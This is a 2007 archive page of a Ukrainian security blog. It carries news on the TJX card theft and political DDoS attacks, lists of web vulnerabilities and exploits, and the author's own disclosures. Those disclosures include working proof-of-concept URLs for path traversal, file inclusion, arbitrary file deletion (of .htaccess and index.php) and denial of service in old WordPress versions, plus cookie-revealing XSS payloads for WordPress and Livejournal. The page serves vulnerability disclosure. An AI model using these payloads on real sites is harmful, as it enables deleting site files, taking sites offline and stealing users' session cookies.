Архів за Грудень, 2007

Український хакер причетний до онлайн-крадіжки століття

19:26 29.12.2007

Правоохоронні органи США дуже сильно зацікавилися громадянином України Максимом Ястремським, що деякий час тому був арештований у Туреччині за торгівлю номерами банківських карт в онлайн-форумах. Виявилося, що Ястремський причетний до найбільшої в історії крадіжки, у результаті якої мережа магазинів TJX упустила 45,6 мільйонів аккаунтів з даними кредитних карт.

Немає ніяких доказів того, що арештований українець сам брав участь у крадіжці інформації. Але вже один той факт, що він займався її продажем в Інтернеті, дозволяє правоохоронним органом сподіватися на те, що через Ястремського вони вийдуть на інших зловмисників.

Провина тих, хто вкрав дані про кредитні карти, очевидна. Але вражає те, як легко їм це далося. Вони взламали бездротову мережу компанії, що була захищена не краще деяких домашніх мереж, і протягом 17 місяців мали доступ до всієї інформації в реальному часі. Більш того, хакери навіть обмінювалися між собою зашифрованими повідомленнями через цю мережу.

Ринкова вартість TJX складає 13 мільярдів доларів, але при цьому компанія не спромоглася ввести додаткові заходи безпеки. Тепер вона підраховує збитки - по оцінках самої TJX вони склали близько 256 мільйонів доларів. Аналітики Forrester Research упевнені, що ця цифра згодом збільшиться в чотири рази.

При цьому, ініціаторів взлому так і не знайшли. Хіба що у Флориді була арештована людина, що використовувала вкрадені дані для здійснення транзакції в розмірі 8 мільйонів доларів на свій рахунок, але не була власне виконавцем крадіжки. Можна представити тому, з яким ентузіазмом поліція візьметься за допит Максима Ястремського.

Громадяни України, схоже, незабаром стануть для США таким же грізним явищем, як міфічні “російські хакери”. Як вже повідомлялося, дані зі взламаного раніше рекрутингового сайта Monster.com, завантажувалися на сервер, розташований на території України.

По матеріалам http://webplanet.ru.

Добірка уразливостей

16:37 29.12.2007

В даній добірці уразливості в веб додатках:

  • XSS in JBoss Portal (деталі)
  • Virtual Calendar <= (pwd.txt) Remote Password Disclosur Vulnerability (деталі)
  • Radical Technologies - Portal Search - multiple XSS issue (деталі)
  • Jportal 2.3.1 CSRF vulnerability (деталі)
  • DotClear Full Path Disclosure Vulnerability (деталі)
  • SQL injection in mosgetparam implementation in Joomla! (деталі)
  • Vulnerability in Joomla! (деталі)
  • PHP remote file inclusion vulnerability in Azucar CMS 1.3 (деталі)
  • Cross-site scripting (XSS) vulnerability in Knusperleicht ShoutBox 2.6 (деталі)
  • Vulnerability in Bandwebsite (aka Bandsite portal system) 1.5 (деталі)
  • PHP-інклюдинг в site_news (деталі)
  • Міжсайтовий скриптінг в Ace Helpdesk (деталі)
  • PHP remote file inclusion vulnerability in PowerClan (деталі)
  • CRLF injection vulnerability in Oracle Portal 10g (деталі)
  • Декілька уразливостей в Sisfo Kampus (деталі)

Local file include, Directory traversal та Full path disclosure в WordPress

23:50 28.12.2007

В червні, 09.06.2007 (в admin.php) і 15.06.2007 (в themes.php), я знайшов Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах admin.php (параметр import) та themes.php (параметр page).

Full path disclosure:

http://site/wp-admin/admin.php?import=\..\..\wp-config
http://site/wp-admin/themes.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше.

Local file include та Directory traversal:

http://site/wp-admin/admin.php?import=\..\..\file
http://site/wp-admin/themes.php?page=\..\..\file.php
http://site/wp-admin/themes.php?page=\..\..\.htaccess

В файлі admin.php через параметр import можна лише підключити файли з php розширенням.

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

DDoS-атаки в політичних цілях

22:47 28.12.2007

Дослідник ІБ Хосе Назаріо привів докази використання ботнетів для здійснення DDoS-атак у політичних цілях.

Політичні події у світі іноді пов’язані з інцидентами в кіберпросторі. Ніхто не приділяв цьому багато уваги доти, поки на початку 2007 р. не відбулися “DDoS-події” в Естонії, коли урядові і комерційні об’єкти невеликої країни виявилися паралізовані на декілька днів. Масова атака була пов’язана з переносом пам’ятника Бронзовому солдату. Для атаки естонських сайтів використовувалися ботнети, організовані російськими хакерами. Передбачалася участь у кібератаці російського уряду, однак доказів немає.

Хосе Назаріо, старший науковий співробітник безпеки Arbor Networks, зафіксував, як ботнети брали участь у більш пізніх DDoS-атаках, мотивованих політично. Назаріо протягом останніх трьох місяців (жовтень-грудень) відслідковував напади на український сайт про-російської партії.

Раніше фіксувалися DDoS-атаки на сайт президента України Віктора Ющенко (про котрі я писав). На минулому тижні Назаріо відстежив атаки на сайт Гаррі Каспарова, російського шахового гросмейстера.

Мотиви цих нападів залишаються неясними. “Я дивуюся, чим об’єднані ці атаки. Складно визначити мотиви російських хакерів, - пише Назаріо. - Я буду відслідковувати кібератаки, щоб визначити їхній характер”.

По матеріалам http://www.secblog.info.

P.S.

Мотиви тут як раз зрозумілі. По-перше - політичні, як видно з переліку атакованих сайтів. А по друге - економічні, хто заплатить, той і замовляє кого DDoS-ити.

Уразливість на itware.com.ua

19:27 28.12.2007

30.07.2007

У лютому, 06.02.2007, я знайшов Cross-Site Scripting уразливість на популярному проекті http://itware.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.12.2007

HTTP Response Splitting + XSS:

Дана уразливість вже виправлена.

Добірка експлоітів

16:38 28.12.2007

В даній добірці експлоіти в веб додатках:

  • Joomla Component RSfiles <= 1.0.2 (path) File Download Vulnerability (деталі)
  • Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability (деталі)
  • Joomla Component NeoRecruit <= 1.4 (id) SQL Injection Vulnerability (деталі)
  • Arcadem 2.01 Remote SQL Injection / RFI Vulnerabilties (деталі)
  • XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit (деталі)
  • PHPNS 1.1 (shownews.php id) Remote SQL Injection Vulnerability (деталі)
  • ABC estore 3.0 (cat_id) Remote Blind SQL Injection Exploit (деталі)
  • xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability (деталі)
  • PHPNuke-Clan <= 4.2.0 (mvcw_conver.php) RFI Vulnerability (деталі)
  • HyperBook Guestbook v1.30 (qbconfiguration.dat) Remote Admin md5 Hash Exploit (деталі)

Directory traversal, Arbitrary file deletion, DoS та XSS в WordPress

23:49 27.12.2007

В червні, 05.06.2007, я знайшов Directory traversal, Arbitrary file deletion та Denial of Service уразливості в WordPress. А 28.10.2007 ще додатково Cross-Site Scripting уразливість. Дірки в файлі wp-db-backup.php - в плагіні WordPress Database Backup.

В минулому році була знайдена Directory traversal уразливість в плагіні WordPress WP-DB Backup. Котра була виправлена в WP 2.0.4.

Directory Traversal:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess

Як я виявив даний плагін також вразливий до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше стосовно іншої дірки в цьому движку - Local file include та Directory traversal в WordPress.

Directory Traversal:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

Ця дірка також вже була виправлена в WP 2.0.4. Тому вразлива WordPress 2.0.3 і попередні версії. Окрім Directory traversal, я ще виявив інші уразливості.

Також можливо видалити довільний файл на сервері (на котрий має права даний користувач). Тому що плагін WordPress Database Backup видаляє файли, до котрих відбувається запит - причому незалежно від того, чи скачає користувач файл, чи ні, в будь-якому випадку файл видаляється.

Arbitrary file deletion:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess

Тільки на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

Це також може бути використано для проведення DoS-атаки. При видаленні index.php сайт перестане нормально функціонувати.

DoS:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php

Тільки на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php

Вразлива WordPress 2.0.3 і попередні версії.

XSS:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Слабкі дозволи в Apache Tomcat

22:53 27.12.2007

Виявлені слабкі дозволи по-замовчуванню в Apache Tomcat.

Уразливі версії: Apache Tomcat 5.5, Tomcat 6.0.

Компонент JULI logging дозволяє перезапис файлів.

  • Apache Tomcat’s default security policy is too open (деталі)

XSS на Livejournal.com

20:45 27.12.2007

Нещодавно мені повідомив читач мого сайту про Cross-Site Scripting уразливість на популярному блог сервіс Livejournal.com. Як я вчора перевірив, уразливість мала місце. На сайті LJ на сторінці update.bml була reflected та DOM based XSS в параметрі usejournal.

XSS:

http://www.livejournal.com/update.bml?usejournal=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Коли я сьогодні вирішив написати про це, вияснилось, що власники Livejournal вже виправили цю дірку (їм явно про неї повідомили). Але я швиденько знайшов дві нові XSS ;-) , про які повідомлю найближчим часом.

Також сайт вразливий до Expect HTML Injection і ця дірка досі не виправлена. Так що власникам Livejournal потрібно краще слідкувати за безпекою власного сервісу.

Добірка уразливостей

17:29 27.12.2007

В даній добірці уразливості в веб додатках: